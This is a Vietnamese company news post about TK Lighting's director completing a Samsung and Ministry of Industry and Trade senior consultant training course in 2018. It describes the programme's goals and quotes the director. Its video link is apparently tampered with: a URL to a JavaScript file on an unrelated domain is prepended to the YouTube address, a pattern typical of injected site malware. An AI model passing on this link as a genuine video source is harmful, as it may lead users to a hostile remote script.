Ngày 8/7/2018 vừa qua, TK Lighting đã hoàn thành khóa học Tư vấn viên cao cấp do Tập đoàn SAMSUNG phối hợp cùng Bộ Công Thương Việt Nam tổ chức.

Về phía TK Lighting, đại diện tham gia khóa học là Ông Nguyễn Xuân Thủy – Giám đốc Công ty – tham dự theo lời mời từ phía Bộ Công Thương. Khóa học nói chung đã đem lại nhiều kiến thức và kĩ năng rất giá trị, được chia sẻ cởi mở và huấn luyện chuyên nghiệp từ 1 trong những Tập đoàn lớn nhất Hàn Quốc.

tu van cong nghiep viet nam - sam sung va bo cong thuong - tklighting 2

Ngày 8/7/2018 vừa qua, Công ty chiếu sáng ngoài trời TK Lighting đã hoàn thành khóa học Tư vấn viên cao cấp do Tập đoàn SAMSUNG phối hợp cùng Bộ Công Thương Việt Nam tổ chức. Về phía TK Lighting, đại diện tham gia khóa học là Ông Nguyễn Xuân Thủy – Giám đốc Công ty – tham dự theo lời mời từ phía Bộ Công Thương. Khóa học nói chung đã đem lại nhiều kiến thức và kĩ năng rất giá trị, được chia sẻ cởi mở và huấn luyện chuyên nghiệp từ 1 trong những Tập đoàn lớn nhất Hàn Quốc. 

tu van cong nghiep viet nam - sam sung va bo cong thuong - tklighting 3

Theo đó, Chương trình hợp tác đào tạo chuyên gia tư vấn Việt Nam trong lĩnh vực Cải tiến sản xuất và Nâng cao chất lượng chính thức khai mạc vào tháng 4/2018. Mục tiêu của chương trình nhằm đào tạo 200 chuyên gia tư vấn người Việt Nam có đủ năng lực để tư vấn và đào tạo lại cho các doanh nghiệp cung ứng trong ngành công nghiệp hỗ trợ của Việt Nam, từ đó giúp các doanh nghiệp này nâng cao năng lực cạnh tranh để nắm bắt được cơ hội tham gia vào các chuỗi cung ứng toàn cầu.

Chương trình đào tạo sẽ kéo dài trong 2 năm 2018 – 2019 với 8 khóa học, mỗi khóa học kéo dài 12 tuần bao gồm 4 tuần cho việc đào tạo lý thuyết và 8 tuần cho việc đào tạo thực hành tại doanh nghiệp nội địa. Với mục tiêu đào tạo được 200 chuyên gia, mỗi năm chương trình sẽ đào tạo 100 chuyên gia tư vấn lành nghề theo một quy trình tư vấn đã được Samsung áp dụng rất thành công bao gồm: Đánh giá tình hình hoạt động và tình hình kinh doanh của các doanh nghiệp hỗ trợ Việt Nam; Tư vấn đổi mới sản xuất, quản lý chất lượng và lưu thông hàng hóa thông qua việc duy trì môi trường làm việc (5S3D) và cải tiến năng suất; Cải thiện cơ sở sản xuất như chất lượng và lưu thông hàng hoá.

“Khóa học là cơ hội tuyệt vời mà bản thân tôi hay TK Lighting có cơ hội tham gia. Với những kiến thức quý báu và trải nghiệm “thực hành cải tiến công ty” trong khóa học mà các Partner và Thầy giáo chia sẻ, tôi hi vọng sẽ cùng TK Lighting cải tiến, đổi mới Công ty để tạo ra các sản phẩm, dịch vụ chất lượng nhất cho Khách hàng.” – Ông Nguyễn Xuân Thủy chia sẻ.

Sự kiện được Các cơ quan thông tấn báo chí đưa tin rộng rãi

Báo Vietnamnet: Đọc tại đây

‘Báo Bộ Công thương: Link

Xem Video Khóa học:

https://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&www.youtube.com/watch?v=tgPKMK_d_FU&feature=youtu.be

 

 

 

TK Lighting tham dự Khóa học Tư vấn Viên Cao Cấp của SAMSUNG & Bộ Công Thương
4 (80%) 1 vote